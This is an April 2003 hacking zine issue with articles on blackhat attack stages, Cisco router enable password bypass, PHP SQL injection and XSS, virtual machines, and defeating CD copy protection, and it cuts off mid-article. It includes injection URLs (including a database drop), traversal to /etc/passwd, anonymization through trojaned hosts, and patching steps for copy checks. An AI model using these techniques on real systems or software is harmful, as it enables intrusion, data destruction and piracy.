. % . +%. ..++.+ .++++2%.++ .. 2222222$+22. %22 $22222+ ..%. .+ +2+.+. .+++. .. +A$+M$.YQ H% M. 0U $$ ++. .+ . +. +. +% .+ .M M 2A A0 .%+. %. +. .+. + %+..$$+YH YHUUUUU#0 MHUUA+. + .+. $ .$. + ..+ .+ .%.DD AD N2 %M . $$. .. . %. $ +U% M2 M DU .++ ..++.2+.$+$ ++ $M+ %M+ YN..UU222Y0. .+.+ . 22+ 22+ .22.+222222 2+ %MD2$YD AN+ 0Y%22D% 0H$#UYQ#YUH .H$ %M$ %Q YH DD +Q2 .2 DD + Q% . U2H 2M D0 MY Q$ H% Q0 M A MY DA N0 %M. M 0M 2DU. M+ YM D+ DD A2 M. QD YA 0M M M DD 00222YN M 0M $UY U0 +HY DH 0A N2 2U M. %# $ .AUUUY2 $UD 2DY2D$ %UU YU0 .UD YU2.UUUUUUY %MD22YQ %MD2$YA. 0Y$22U. UQ222H$ $N %Q $H $Q% 2. #0 0A .% DD MY%N. M. $ DA22Y+ N0 M.QD 2AU 0N222Y N M. AD #0 0A DD +M 2 +M $AD $Q% Q0 UD +% AUUUUUD.AUUU02 +0D2YD% 2UUUUUU +220DD0022220U22220DDDA2$2 +22$2DDUUU0DD00000000000000000DD00AUUADD+222 %22D0QUU000000000000000000000000000000000000000DD0AUUUDY22 +222222222222222222222222222222222222222222222222222222222222222+ .:The Digital Edge- Editor's Note:. TDE is a submission-based zine brought to you by hackingzone.org, nitesecurity.com, and various interested parties. The editors of TDE aim to create a zine where innovators and researchers of the digital underground scene can report their findings and share knowledge. If you are interested in contributing to the zine or learning more about it, visit http://www.hackingzone.org/tde/ *Debut Issue* +111111111111111111111111111111111111111111111111111111111111111+ +000000000000000000000000000000000000000000000000000000000000000+ April 2003 IN THIS ISSUE Anatomy of an Attack : Modest................................ Cisco Password Recovery : Kayin.............................. PHP Security Issues : nwo.................................... Virtual Machines : Agni...................................... Game Copy Protection : Agni.................................. Jave Security : 0versight.................................... A New Addition to your Beige Box : Colt45 and wizbone........ Plaftorm Independance : Agni................................. +00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000+ +11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111+ .......................................................................... Anatomy of an Attack: Overview of How Blackhats Break Into Networks By modest ......................................................................... In order to understand how to prevent attacks, network administrators must understand the methodologies that blackhats use. Throughout this document, the word "blackhat" will refer to a hacker that uses their knowledge to illegally penetrate a network. The network under attack can be part of an organization, government agency, or a company. In order for an attack to be successful and efficient, the blackhat will follow distinct steps. The following are a rough description of the sequential stages in an attack: Getting anonymous Passive information gathering & reconnaissance Footprinting the network Preliminary scanning Identify single host to target Penetrate firewalls and avoid IDS Attacking from remote- gaining shell access Privilege escalation Compromising the network Covering Tracks 1. Getting Anonymous Before any active scanning can begin, and in some cases, some passive network footprinting, blackhats will wisely try to obfuscate their trails on the internet. There are various methods one can use to hide their identity, and the most effective strategy is to mix different methods. The more methods used, the less of chance of being tracked, but bandwidth can decrease and chance of connection loss becomes possible. -Connections can be bounced through proxies and wingates. Proxies and wingates are used to forward connection requests and bounce connections, usually used to facilitate access between networks. Proxies are often used by companies to set up internet access to computers in a network, but many are misconfigured and allow outsiders to use them to bounce. Also, many privacy groups set up proxies so that your web browsing can be bounced through them to protect your identity. A proxy consists of a computer running a proxy server. Wingates are similar, but they allow for the bouncing of a telnet connection. Typically, an attacker will chain several proxies. Proxies can be scanned for with tools like Proxyhunter for windows or can be gotten from lists that people submit to on the internet. Usually a misconfigured proxy will go down soon after being publicized because it will be abused. proxyhunter can be found at http://www.proxys4all.com/tools.shtml A proxy list can be found at http://www.cybearmy.com/lists/ And http://www.multiproxy.org/anon_proxy.htm -Misconfigured and/or insecure wireless LANS could allow an attacker to tap into the network (across the street) to get free internet access. A blackhat could simply park a car across the street from a building with one such network and get free internet access. -Cracked shell accounts (accounts on a unix/linux server that allow users to log in and store files, send mail) can be used in the chain also. The attacker will log in to the cracked account and then continue the chain from there, or use the shell as the last in the line in order to compile and run attack tools from that shell. -An acoustic coupler is a device that turns modem signals into sound so that it can be played into a phone receiver. Example: hacker can use a payphone to dial up to an ISP like netzero and use a cracked account. The downside of this is that the bandwidth is very low. -A Blackhat could scan an ISP's cable/dsl subnets looking for computers that are infected with sub7, netbus, or other trojan remote access viruses and route the attack through them. Sub7 specifically allows for port forwarding of traffic, which is perfectly tailored for just this use. Smarter blackhats will bounce connections between countries at war or with different languages so that it takes longer to trace back each bounce, hoping that one administrator will have deleted their connection logs by the time they are notified that their system was part of the chain used by a blackhat. 2. Gathering Information- Passive reconnaissance and public databases. The first thing a blackhat can do is data mining from websites using tools that crawl html looking for any useful information, like links to other sites within that organization, email addresses, phone numbers, names, geographic information on the network, etc. There are many free programs that will cache an entire internet site locally. In the case of attacking a known registered domain (like www.whatever.com), public databases like ARIN and InterNIC are very useful for finding out information about registered domains that belong to the organization. Whois and nslookup run from the command line are examples of tools that query such databases. Finding IP blocks registered to the company will give clues on size of the network. Zone transfer on misconfigured DNS servers within the network will transfer all DNS information to the attacker, providing a gold mine of information on what different hosts on the network are used for. Reverse DNS resolutions on IP blocks will give clues as to what those hosts are used for. www.samspade.org is a collection of online tools that can get information from public databases. 2.5 Social Engineering The blackhat may consider social engineering at this stage and at any other point in the attack. This would involve contacting people within the organization via phone or email, usually fraudulently, in order to get information out of them that would help the blackhat (passwords, etc.). Example: recently I read about someone who called AOL and pretended to have jaw surgery. They instructed to service personnel on the other line to repeat everything that they said during the call, so that they could be sure they were being heard correctly. They were asking for a password for an account and whenever the AOL person would ask for information like name or address, they would mumble a string of meaningless garbage and the AOL person would assume they were saying the right information and repeat back to them information that actually was correct. After a few phone calls like this, the person had enough information to call and get the password changed without mumbling. 3. ICMP scanning Once a general idea of the size and setup of the network is achieved, scanning can begin on the more "interesting" ip blocks- ones that have interesting reverse DNS names, for example. ICMP scanning is a method of determining which hosts on the network are alive and not behind firewalls, and it involves pinging entire IP ranges. An intrusion detection system can detect IP range scanning and implement a firewall ruleset that will block all traffic from the offending source. A trace route to ip addresses within the netblock that are behind firewalls will show where the firewall is located and can also be used to footprint the network and find interesting hosts. Once a list of live, interesting hosts is achieved, attacking can begin. 4. Focusing on one computer- Port scanning Port scanning is the process of sending packets to ports on a host to determine what services are being run. For example, a port scan on a computer that is hosting a website would probably reveal a web server running on port 80- port 80 is the standard port for web servers and your web browser will always check port 80 for the web server unless you tell it otherwise. Randomizing the port scan source through different proxies, using dummy packets, and using only a partial tcp connection can avoid detection by intrusion detection systems. Nmap is the most powerful port scanner out there, offering a multitude of scanning options, including a huge database of information that helps detect what Operating System (called OS fingerprinting) the host is running during the port scan. Knowing the operating system is vital in order to decide how to attack it. Nmap is open source and free, and a version for windows was recently ported. It can be found at insecure.org. Superscan is a decent windows port scanner that is simple to use, although it doesn't offer any of the advanced features that Nmap does. It can be found at www.foundstone.com 5. Options of attack Once the operating system is known and the blackhat has a list of open ports, the blackhat will begin to focus his attention on finding the weakest link into the system. Since a blackhat is only concerned with access and not securing the system, they only need to find one way in, making their goal significantly easier. There are two main ways that the blackhat can attempt to gain access: -Brute forcing, attempting a dictionary attack, or trying default passwords against a login service. -Using an exploit on an insecure service running on a certain port to gain access directly or to gain access to password files that can be decrypted. 6. Breaking passwords remotely Login services that provide shell access to users are often the targets of brute forcing/dictionary attacks. A user logging in to a telnet server, which usually runs on port 23, will have to know a username and password in order to get access to their account. Brute forcing is often a time consuming and implausible process that involves testing random characters in a systematic way in order to eventually guess the password. It becomes especially difficult if the username is unknown as well, because the brute forcing program will have to guess both the username and password correctly in order to break into an account. Dictionary attacks involve trying a list of words as passwords and are far more plausible because weak passwords are very common, and can be a critical security problem if there are many users because there's a good chance that one user will have a weak one-word password. This is all it takes for the blackhat to be well on the way to gaining root (administrator) access to the system. Brute forcing and dictionary attacks are often avoided by blackhats because multiple failed log-ins can cause intrusion detection systems to notify administrators that the network is under attack. Brutus is a solid windows remote brute forcer that allows for brute forcing and dictionary attacks. It can be found at: http://www.hoobie.net/brutus/index.html 7. Exploits There are many different types of vulnerabilities and methods of exploiting a service. When programmers develop their software, they often overlook proper coding principles that ensure that their software is secure. Browsing www.securityfocus.com will show how many serious security flaws were discovered recently in various software for various platforms A blackhat will look at the list of open ports at a system and attempt to learn as much about each service behind it as possible- what the vendor is, what its used for, and what version it is. This is can be done by grabbing banners- using telnet or netcat to connect to a port and see how the service responds (telnetting to my own ftp server reveals that I am running Bulletproof Ftp server). They can then search the internet using google.com and exploit search engines to see if any vulnerabilities exist in that software for them to employ. An example of a serious security flaw that is found in many ftp servers are Directory Traversal attacks. Example: anonymous ftp access is granted to the public on a company's ftp server so that customers can download the latest drivers and software patches. A blackhat discovers that the ftp server is outdated and the version being run has Directory Traversal vulnerability. He finds an exploit proof of concept code someone has written and posted on the internet and uses that to look at folders outside of what was meant for the public to be restricted to. He changes his directory from./public/drivers/ to /etc/shadowed/ and downloads the encrypted password file for the administrator's telnet login so he can decrypt it and log in as the administrator. This is one example of many types of remote exploits. Blackhats who are extremely skillful can scour binaries in closed-source software and source code in open source software to develop their own exploits if confronted with a server that has no known vulnerabilities. There are even tools that will attempt common vulnerabilities against the server itself. 8. The password file Oftentimes, through use of an exploit, a blackhat may be not be able to gain an account immediately but instead may just have file read-access to the server and is able to download a password file. There are many programs out there to decrypt various password files, using complicated algorithms to speed up brute forcing and dictionary attacks against the encrypted password file. Encrypted password files are often impossible to decrypt instantaneously because the password is incorporated in the algorithm used to encrypt the file. Hence, the only way to discover the password is to encrypt passwords until the hashes are the same. John the Ripper is one of the many free, open source password crackers made to crack weak Unix password files using various methods. It can be found at http://www.openwall.com/john/ Furthermore, if many password files have been downloaded, it becomes increasingly easier to find one with a weak password. All it takes is one weak password to allow the blackhat to get a foot in the door. 9. Privilege Escalation Once an account has been secured by the blackhat, they may need to escalate their privileges so that they have root access; total control over the system. One of the most effective methods of gaining root access is using a buffer overflow in a function. Buffer overflows are advanced techniques and their discussion is beyond the scope of this presentation. Basically, if certain commands and functions allowed to the user are not protected from memory manipulation by the blackhat, then by abusing the memory stack in the function the blackhat can turn an ordinary restricted account into root. The blackhat can use their knowledge of the Operating System to look on the internet for known buffer overflows in the functions available to them or even attempt to discover their own. 10. Taking Over One of the first things a blackhat will do once they've gotten root access is install a rootkit. Rootkits are tailored specifically for certain operating systems and certain setups, and they modify critical operating system files and the system kernel itself in such a fundamental way that the presence of the blackhat at any given point is completely hidden, even from security measures themselves. There are tools used to combat rootkits such as tripwire (www.tripwire.com) and the blackhat may have to circumvent such security measures as well. They may also create a backdoor on the rooted system- a simple guaranteed entrance so that the blackhat can return at another point. 11. Scouting the Network At this point the blackhat may not be satisfied with compromising the one system and may want to get deeper into the network. Because they now can launch attacks from a system within the network, they may have a higher trust and can pass packets through firewalls that would normally be problematic to connections from a source outside of a network. In this sense, there are probably more hosts that can be targeted. Sniffing becomes a huge issue at this point. By putting the network interface card into promiscuous mode, the compromised system will listen to all traffic passing through it on the network. Since Ethernet works by broadcasting data to every machine on the line and not just the one who it's addressed to, a sniffer may be able to pick up sensitive information, including encrypted and plaintext passwords. Powerful, freeware, open-source sniffers are available for just about any operating system. Dsniff is a tool that is used to sniff certain protocols out- telnet, ftp, ssh- and store the important information being passed through them as they are transmitted on the line. Ettercap is described by its website as "a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis." http://ettercap.sourceforge.net/ Ethereal is described on www.ethereal.com as "a free network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, viewing summary and detail information for each packet. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session." Sniffing is a very serious security risk and is also very difficult to detect. ARP poisoning is another technique used by blackhats once they've penetrated a network. This involves sending spoofed ARP packets to a host on the network in order to poison its ARP tables. ARP tables are stored in each host on a network and they list MAC addresses with IP addresses. By causing a target system to change its ARP tables, you can redirect traffic between computers on the network through the compromised system first by fooling a host into thinking that the compromised system's MAC address is associated with a certain IP address. 12. What next? Now, the blackhat can either dig deeper into the network or sit on the compromised system. They can steal information from it. They can change a website that is stored on it. They can use the system as part of a distributed denial of service attack against another system. They can change publicly downloaded files stored on that system and bind them with viruses. They can use it as part of a chain in the next attack. The possibilities are scary and real. -modest www.caveatabacus.0catch.com +11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111+ Cisco Password Recovery by Kayin Table of Contents --- Introduction The cisco IOS Basic modes of the IOS The configuration Registers Step by Step Password Recovery Conclusion --- Introduction --- Ever since computers have been invented, people have always wanted a way to make them easier to use and easy to adapt to take over some of the grueling tasks of life that a majority of people really just don't want to do. To make this happen, communication between machines is a necessity. Out of necessity comes invention, and the "network" was born. Today as we all know, networks are connected to other networks which are connected to even more networks. Altogether we have one big network made up of smaller networks thatwe like to call the internetwork or just the internet. Routers are the fundamental backbone of the internet. They single handedly make the internetpossible. This is true because routers are the only machines that can completely seperatea network from another network and still allow them to communicate back and forth. A switch cannot replace a router, even if it is running VLANs (virtual local area networks). This is mainly because a router deals with layer 3 (the network layer) of the OSI model. What does that mean? Well, a switch only goes to layer 2 (the data-link layer) of the OSI model, which fundamentally deals with the hardware addresses of individual nodes and workstations. A switch keeps a cache of these individual nodes for communication on a local network. A router basically keeps track of the network addresses of these LANs and routes information from one LAN to another LAN. The primary difference between a switch and a router is that a switch keeps track of the individual workstations and a router keeps track of where these switches are so it can pass information to the switch which will then give it to the workstation. Since a switch is so locally oriented, it can not do the work of a large scale router sufficently enough to actually be used in the workplace. --- The Cisco IOS --- 80% of the internet is owned by a company called Cisco. Cisco makes hubs, switches, and of course routers. They have the reputation of making the best routers. If you were to do a trace rout of www.aol.com, chances are 80% of the routers you go through were made byCisco. Cisco has several different families of routers that are based on bulk of what they can handle. The 2500 series routers are good learning routers and are relatively cheap. 7000 series routers are about the size of a large server, used for backbones of midsized companies and can cost upwards of a few hundred thousand dollars. The 12000 series is the largest family of routers so far. They are massive internet backbones and cost well over one million dollars. Routing is basically getting a packet from network A to network C. To get from network A to network C, you must pass through network B. Thats what a router is. It takes the packets comming in from A, look at their address, see that they need to get to network C, and thensends them to point C. Its a fairly simple process. Unfortunately, routing a packet througha small digital universe becomes no longer simple. Do a trace rout on a server in Italy, you're going to pass through a lot of routers. For this reason, all routers are built to operate in complex and large environments where there are no standards. This makes all of your routers very versatile but very difficult to configure. Due to the difficulty in configuration, Cisco decided to make software to run on a router to be fully configurable in any environment. They ended up with an operating system called the Cisco Internetworking Operating System. This operating system's sole purpose is for routing. So don't let the fact that its called an operating system scare you away. The IOS is fairly easy to use, however, it has a command line interface (CLI). For the CLI impared, it has no pretty pictures, you type everything out. Its similar to DOS except no directory hiearchy. The router administratorperforms all actions through either a serial console session or most commonly through a terminal session (telnet). Note: Before you start thinking "oh telnet, I'm a 1337 haxor and I smell an easy hack" keep in mind that cisco is not microsoft and therefore they possess some intelligence regarding very obvious things. That and Cisco admins are very..possessive..with their routers, theyget a little more upset when you try to get into their routers...I've noticed from um experience. --- Router Modes --- To perform password recovery on a router, it would at least be wise to know the modes thata router can be in. In the case of simple router usage and password recovery, there are 5 modes you need to be aware of. -Setup Mode -User Exec Mode -Privileged Mode (enable mode) -Configuration Mode -Rom Monitor Mode The very first time you boot up the router, or anytime the router doesn't find a configuration file in the NVRAM (non volatile random access memory, kinda like a router's hard drive, it will go into Setup mode which is there to help you setup the configuration file. It asks you what protocols you want to enable and all that fun stuff. Its kind of like a survey, very easy to use, and has no other purpose. When you first log into the router, you will be put in User Exec Mode. In this mode, you can't do much at all. It exists for security reasons. In this mode, you can look but not touch, meaning it'll allow you to view certain setups and configurations. It doesn't allow you to view sensitive configurations (configurations displaying set passwords for instance) and deffinately does not allow you to edit anything at all. Privileged Mode, or enable mode, is the admin mode. It allows you to access the configuration mode and shows you everything. It requires an encrypted password to access this mode. This password is the one being recovered in this article. Configuration mode is a special mode that allows you to edit various lines of the router configuration. You pretty much change everything in this mode. Rom Monitor mode is a mode that has basically 2 uses, troubleshooting and password recovery. Since, in the typical workplace, you'll never use this mode. Becuase of that, a lot of people tend to completely forget about it. It's also a real pain in the butt to access because you have to change the configuration registers upon bootup to even access it. Routers rarely even get rebooted due to the fact that when rebooting a router, you take down your access to the internet, as well as communication to other networks which can result in serious problems as well as a lot of phone calls to your office. But, of course, severity all depends on your network design. --- Configuration Registers --- Configuration registers are a 16 bit software register built into each router. In English they're bootup options that you can set to modify how the router boots up. Since they're 16 bit, there are 16 options that you set in binary. On older routers they are jumpers on the board of the router itself. On newer ones they are software. They're set in binary, but since there's 16 bits, we could simply set it in Hex and accomplish the same thing more quickly. -------------------------------------------- 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0 - options (config registers) 0 0 1 0 0 0 0 1 0 0 0 0 0 0 1 0 - whether options are chosen or not -------------------------------------------- (options that have value 1 are chosen to load) Each option is set to determine what is loaded upon booting. Since in the Cisco IOS you have to choose the options in Hex, using the table above you have to convert from binary into hex. If you don't, the windows calculator does. The above configuration reads 2102 which is the router default. Most of the configuration registers deal with where the IOS will be booted from via TFTP site, flash memory, rom, or just NVRAM. Its not relevant to this article and thus is not included. --- Step by Step Password Recovery --- Cisco routers use a lot of passwords to emphasize security. Off the top of my head, there is a password for console connections, terminal connections, there are 2 passwords for entering enable mode, the general enable password and then the enable secret password. The enable password is overwritten by the enable secret password which is also encrypted. Note: While in enable mode you can view all passwords except the enable secret password in plain text by showing the current running configuration using the command "show running-config" (can be useful if you have access to a router when the admin walked away without logging out) 1. First and foremost you have to get the router so you can change its configuration registers. At the command line you can use the command config-register. You can also reboot the router and hit the break key. The break key alters with different routers so you might have to do some research. (Hint: www.cisco.com) 2. If you hit the break key, it'll dump you in ROMMON mode, but it will have loaded some of the NVRAM already meaning you can't change the password yet. What you have to do is change the config registers using the command "confreg" or "o/r 0x2142" Then reload the router using the command "reload" or "initialize" depending on the router series. Note: since the config register is written in HEX you have to place a 0x infront of the register you choose to specify. Also, to boot to ROMMON without loading part of the startup config from NVRAM you need the register 2142. Refer to the table in the last section to which bits are activated using that hex number. 3. When the router has reloaded in the appropriate mode, it will ask you if you want to run Setup mode to build a new router configuration. If thats what you want to do, then be my guest, if not, then don't. 4. If you choose not to run setup mode and build a new configuration then it will dump you to a prompt. To change the enable password you have to be in privileged mode. Use the command "enable" to access privileged mode. Since you booted up the router without its previous configuration there will be no enable password prompt, just as there will be no configuration for routing. 5. Since there is no configuration for routing, specifying a new enable password and saving ur configuration just like that will do nothing more than irritate you or the admin and totally negate the purpose of changing the password. What you want to do is load a working configuration with ur own passwords. The easiest way to do that, is to load the previous configuration from NVRAM. Use the command "copy startup-config running-config" to restore the previous configuration. You might say wait, if you restore the previous configuration won't the passwords come back? The answer is yes, they will, but you're already logged in under enable mode anyway, so it doesn't matter. 6. Since you're logged in under enable mode and have restored the previous configuration you can now reset the enable password by using the command "enable secret [password goes here]" 7. The most common thing here is people forget to save their work. Use the command "copy running-config startup-config" to save what you did back to the NVRAM for the next time you boot up. 8. Change the config registers back to 0x2102 (the default) and reload the router. Congradulations you have just recovered the enable password of a cisco router. --- Conclusion --- In a summery of what just happened, we reset the router to boot differently than normal. Normally routers boot up and perform a POST, then recognize the bootstrap code from ROM (which is what we altered), then the router finds the IOS from the place that the configuration registers designated in the bootstrap, than loads the router configuration file which is usually found in NVRAM (non volatile random access memory, which is a router's harddrive) What we did is told the router to boot a fresh copy of the IOS and bypas the NVRAM's configuration file. That was built into the router for troubleshooting incase the NVRAM became damaged, we used it to bypass the enable password. Pretty convenient huh? -Kayin +11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111+ PHP Security Issues ! by nwo I am not writing long articles and elaborate them perfectly. But I will try my best here to explain you some of the pretty common php errors. This article will cover.. 1. Danger due to global variables 2. SQl Injection Attacks 3. Cross-site scripting attacks 4. Some other essential issues 1. Danger due to global variables - In php.ini file, there is one variable called "register_globals". If it's turned on, all the variables of array $_POST[],$_GET,$_COOKIES,$_SESSIONS are available directly. That means you can use them just like local variables. Initially it doesn't look like a big problem. But if you are not an experienced php programmer, it may create some havoc. Consider the following example : Here if, register_globals is turned on, user can change the value of the variable $valid. So if someone enters http://www.yoursite.com/user.php?valid=1 then he would easily by-pass the authentication beacuse the variable $_GET[valid] will be available as $valid. This problem is more of the intialization problem then of register_globals. If the file is written as following, then it won't be of any trouble even if register_global is on. The easiest way that I can think of combining ease of register_globals off and security is to have a set of initializer at the top of the file like.. $name=$_POST[name]; $email=$_POST[email]; 2. SQL Injection Attacks We all love to use database to build our sites. It really provides us a lot of power. But SQL can be receipe for a disaster. If you don't take much care while writing your PHP Scripts that deals with database, it could create some real serisous trouble. Consider the following example : $query="SELECT * FROM info WHERE city='$_GET[city]'"; The URL would look something like http://www.hackingzone.org/inject.php?city=newyork Now if I want to get details for city called "london", then I enter the URL as < http://www.hackingzone.org/inject.php?city=newfake' OR city='london' > And guess what, you will get the details of the london city ! This happens because query becomes something like, $query="SELECT * FROM info WHERE city='newfake' OR city='london'"; Now there doesn't exist any city called newfake and you get the detalis of the london city. Here one would have to guess a little details about the database table names. Because it was pure guess that the field name in the database is also called "city". If it was something like "cityname", then I would have to enter < http://www.hackingzone.org/inject.php?city=newfake' OR cityname='london' > and if I wanted to get details of all the cities, I could have entered < http://www.hackingzone.org/inject.php?city=newfake' OR 1=1> Then the query will select all the fields of the database. Or well...suppose if you want to select the first entry of the database ? It's rather simple guessing here. Because the Primary Field is usually named id or something related to tableid..like cityid or countryid. You could have enter the URL like < http://www.hackingzone.org/inject.php?city=' OR id=1--'> Do you notice --' at the end ? It is to comment the rest of the query in MySQL. The query would look like.. $query="SELECT * FROM info WHERE city='' OR id=1--'"; And the worst thing that one could really do is this.. < http://www.hackingzone.org/inject.php?city=;drop db database > While dealing with numbers, you should check wether it's a number or not. You can check it by is_numeric($var) function. Wanna try your hands somewhere ? Play hackingzone.org wargame made by lifofifo called "X-Mall" where you have to use SQL Injection techniques to get the credit card details of Bill Gates. One good example of SQL Injection is of phpBB 2.0.3. The SQL Injection is in the inbox.php file. It's possible to delete all the private messages of the database using one simple SQL Injection technique. The solution is to upgrade to phpBB version 2.0.4. There are several SQL Injection Exploits for phpNuke as well. To prevent SQL Injection attacks, php does provide some good functionality. In php.ini file, there is one variable called "magic_quotes_gpc". If it is turned on, php will automatically add slashes to GET, POST and Cookie data. It is usually must to turn on that variable. Or you can use php's addslashes() and stripslashes() functions. addslashes() add slashes to the variables. You can use it like below before using the variable in query. $name=addslashes($name); If you are inserting the user's input in database, then the slashes will aslo be saved in the database. To remove the slashes after retrieving it from database, you can use stripslashes() function in the same manner as addslashes(). 3. Cross-site scripting attacks This attacks are know as XSS. That's not CSS because CSS was already something at the time this attacks became famous. XSS is mainly about hijacking some other user's session by stealing his/her cookie. When some site has poor user input filtering, this attacks occurs. Take a Bulletin Board for an example. If user's input unfiltered. Then the user can enter malicious html tags and javascript to steal some other cookie. Let's consider a simple example : There is a bulletin board. It's storing username and password in cookie. Now if some malicious user posts something like.. This is my first GIF avatar !! Move your mouse Over Here ! This would appear as : This is my first GIF avatar !! Move your mouse Over Here ! Then when you move your mouse over that text, you will be redirected to that user's fake page with your cookie as an input to his script. He may have designed the script such that he will get an email whenever someone moves his mouse over that text or it can be stored in the database. To prevent such attacks, you could use functions like htmlspecialchars() and strip_tags(). htmlspecialchars() will conver characters to their HTML equivalent entities. For example < will be convereted to < strip_tags() will strip all the PHP and HTML tags from a string. Look out for a wargame on XSS at hackingzone.org pretty soon. May be it's already there when you read this article ;) 4. Some other essential issues You have to be very careful while you are using system() and exec() functions of PHP. If your script is not secure, someone can easily run some arbitary command on the server. escapeshellcmd() function should be used when you are passing user's data to system() or exec(). Also, while using include() and fopen(), you really have to be awake ! include("http://www.myfakesite.com/inme.php"); This way it makes it possible to inject some arbitary code into your file. Also, with fopen('$userinput'); user can input something like "../../../etc/passwd" and you know what's next ;) While you are letting user uploading a file on your server, the file gets uploaded in the temporary directory. But PHP doesn't check for validity of the directory name. You have to check that the file is being uploaded on the proper path or not. Use the function "is_uploaded_file($filepath)". I hope you like this article. +11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111+ Virtual Machines: A Short Introduction by Agni This article describes in brief the concepts of simulation and virtual machines . Simulation : A radical concept introduced way back in the 60's . It was the idea of making a program mimic the actual behaviour of a real world thing . The real world thing could be anything from a simple calculator to a complex car crash test lab . Programming languages like SmallTalk , C++ and (lately) JAVA have always been the best choice due to their support for OOP (i am not trying to undermine the mighty C language ) . OOP seems to naturally tend towards simulation . Virtual Machines : A virtual machine is just what it says it is - A machine that isn't physically present . Hence a machine created through a program ("a simulation") is called a "virtual" machine . The one technique that has to be used when trying to build a VM is to study its real world version throughly . Once all its critical aspects have been understood , building the virtual version should not be a difficult task . In this case however , we are not talking of a generic concept , but a more particular one where an application mimics (almost) the entire behaviour of the Intel 8085 microprocessor . Hence the politically correct term in this context would be a "virtual processor" . IBM (yes! big blue) introduced the concept of virtual processors way back in the 1970's to test new operating systems for its already up and running mainframes . Imagine a mainframe that already is deployed on a network and is catering to a few thousand terminals every minute . Now someone works days and nights building a brand new operating system for this monster so that it could run better . The major problem that the people running the mainframe would now face is - how do you deploy and test a new operating system on a mainframe that is already up and running and catering right now to a few thousand terminals - (and here is the difficult part !) without shutting it down or troubling the connected terminals ? Hmm ! now that seems to be something to think about .. ! But then one of the guys came up with a plausible (although complicated) solution . The most essential thing that is needed to run a program is the CPU and the related hardware . If a test version of an operating system is run on the real hardware of a mainframe , it would most possible make things go haywire . This meant that it was time for simulation to come to the rescue . If a program could be built that would exactly mimic the CPU (and maybe a few more hardware components , if needed) to start with , and the operating system were to be tested on "top" of it , it would just be another running program apart from the few other hundreds of usual programs that would be running on the mainframe .. right ! Now even if something went wrong , this rogue program could be manually killed and restarted , without having to shut down the system or troubling the connected terminals . Presto ! IBM had done it again ! The concept of simulation has helped technology make rapid strides - pilot training , car crash testing , nuclear explosions , architectural projects , futuristic microprocessors .. the list is endless . This is just the tip of the iceberg of what is possible with the concept of simulation . I hope this little article helps you to understand the concepts of simulation and virtual machines . Author : AgNi Contributing Member : HackingZone (e-zine) +11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111+ Introduction This article describes the techniques used in various latest computer games distributed on CD's to prevent piracy . In the present scenario , we can think of two ways in which a computer game on a CD can be "copied" : 1 .the contents of the original cd are "dumped" entirely onto a hard drive , the game is then activated from the hard drive . 2. the contents of the original cd are copied onto another cd with the help of a cd writer . In this case , we talk of how to defend against case 1 . Whether a truly secure solution exists for case 2 is arguable . However , at the moment , there are various mechanisms that exist to prevent case 2 as proposed by : http://www.macrovision.com/ We now proceed to understand the exact nature of the problem with case 1 and how game programmers deal with it . For the rest of the discussion , we assume the role of a game programmer who is developing the game in vc++ or vb code (which is usually the case for games distributed for pc's running "wingdows") . The Problem Description In this section , we focus on the problem on hand as discussed previously . Let us assumre that the game is completed and tested , and that the binary version in its entirety has been written onto a cd . We now are faced with this problem : what happens if the user copies the entire cd onto his pc's hard drive and started the game from the hard drive ? in normal circumstances , the game is obviously going to execute . since it wouldn't make a damn difference to the game if it was running from the hard drive or the cd drive !! It is now our duty to defend our hardwork . But how do we do it ? Programmers with less experience (or who get too excited .. LOL) would suggest something like - "since the problem arises with the user copying the cd's contents onto a hard drive , why not prevent this copying operation ?" Well , harsh reality clearly says that preventing copying this way is not feasible . Firstly , even if you write such code into your game , it must first be activated to give it a chance to prevent the copying from occuring . Why would the user activate it in the first place ;) ? Even if it so got activated (maybe you put it in the taskbar, hence make it a "daemon") , the user could prevent it from running somehow . Other solutions might be - writing the cd in a format that is not usually recognized by the operating system (this requires specifically tailored hardware - hence costly !) . The silliest solution boiling down to tweaking the operating systems shell to prevent it from providing access to the copy command at all ! So , what then is the simplest solution ? The Light at the end of the tunnel The simplest way out is to let the user happily copy the cd's contents onto the hard drive . But somehow find out what sort of drive is the currently active drive , once the game has been activated . As soon as the game is started , you try to find out that the currently active drive is the cd drive (cd writers / cd rom drives / combo drives included) . If it is not , then you simply abort the game from running further . Now , i give you some sample (PSEUDO) code and some hints as to how this can be done on "wingdows" maincode() { int drivetype; string currentpath; string currentdriveletter; //step 1 : run the current drive check currentpath=findcurrentpath(); currentdriveletter=extractcurrentdriveletterfromcurrentpath(); drivetype=checkforcurrentdrive(currentdriveletter); //step 2 : if(drivetype==CDDRIVE) proceed further(); else { display error message(); abort the game(); } } string findcurrentpath() { string p; p=GetCurrentDirectory();//win32 api call return p; } int checkforcurrentdrive(string currentdriveletter) { int drivetype; drivetype=GetDriveType(currentdriveletter)//win32 api call return drivetype; } NOTE : for "wingdows" programmers , the drive type for floppy drives is 2 , hard drives (or hard drive partitions) is 3 and cd rom types (writers / rom / dvd / combo) is 5 . ( or was it 3 for cd rom types and 5 for hard drives and hard drive partitions ;) ?? ) Next , we move onto the BONUS section ;) of this article .. What sort of weaknesses does this mechanism have and How can it be attacked ? Well , firstly anyone who wants to try and "deactivate" this defense must be well versed with assembly language , have a pentium II or III manual , the vc++ ide , lots of time and of course PATIENCE . So , assuming you do .. how would you go about this uphill task ? step 1 : learn to use the single step mode in the vc++ ide , this is extremely critical . you must also know how to set breakpoints in the program . step 2 : plop the game cd into the cd drive (or copy it onto your hard drive) and open the main program using the vc++ ide in binary mode (with single stepping turned on) . step 3 : observe carefully the psuedo code that was given previously . What would be the one step that needed to be "modified" a bit so it could let you play this game from the hard drive , instead of the cd ? //step 2 : if(drivetype==CDDRIVE) proceed 